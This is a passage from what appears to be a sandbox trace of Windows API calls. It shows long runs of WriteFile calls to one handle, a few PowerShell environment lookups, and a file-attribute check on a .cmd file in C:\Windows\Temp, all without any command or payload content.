| out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.795] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.795] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.795] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.796] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.796] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.797] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.797] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.797] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.797] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.798] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.798] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.798] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.799] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.799] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.801] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.801] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.801] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.801] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.802] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.802] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.802] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.802] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.803] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.803] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.803] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.803] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.803] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.804] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.804] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.804] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.804] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.805] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.805] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.805] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.805] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.806] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.806] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.806] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.806] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.807] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.807] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.808] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.808] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.808] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.808] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.809] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.809] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.809] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.809] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.810] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.810] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.810] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.810] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.811] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.811] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.811] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.811] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.812] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.812] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.813] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.813] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.813] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.813] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.814] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.814] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.814] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.814] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.815] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.815] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.815] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.815] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.816] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.816] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.816] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.816] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.817] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.817] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.817] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.817] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.817] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.818] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.818] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.818] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.818] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.819] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.820] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x9ee, lpNumberOfBytesWritten=0xb156f8d4b8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4b8*=0x9ee, lpOverlapped=0x0) returned 1 [0172.820] CloseHandle (hObject=0x9ec) returned 1 [0172.832] EtwEventActivityIdControl () returned 0x0 [0172.833] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144ca50 [0172.833] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e35144ca50, nSize=0x105 | out: lpBuffer="") returned 0x0 [0172.833] CoTaskMemFree (pv=0x1e35144ca50) [0172.931] EtwEventActivityIdControl () returned 0x0 [0172.931] EtwEventActivityIdControl () returned 0x0 [0172.931] EtwEventActivityIdControl () returned 0x0 [0173.083] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144e810 [0173.084] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e35144e810, nSize=0x105 | out: lpBuffer="") returned 0x0 [0173.085] CoTaskMemFree (pv=0x1e35144e810) [0173.089] GetFileAttributesW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd")) returned 0x20 [0173.091] GetFullPathNameW (in: 